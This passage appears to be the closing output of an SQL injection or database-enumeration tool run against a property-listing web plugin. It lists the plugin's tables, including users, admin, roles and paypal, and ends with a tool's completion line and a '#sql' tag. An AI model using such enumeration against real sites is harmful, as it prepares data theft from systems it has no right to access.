property_listing_plugin_log              || property_listing_plugin_log_config       || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties              || property_listing_properties_features     || property_listing_roles                   || property_listing_types                   || property_listing_users                   |+------------------------------------------+[-] Done

Tag

#sql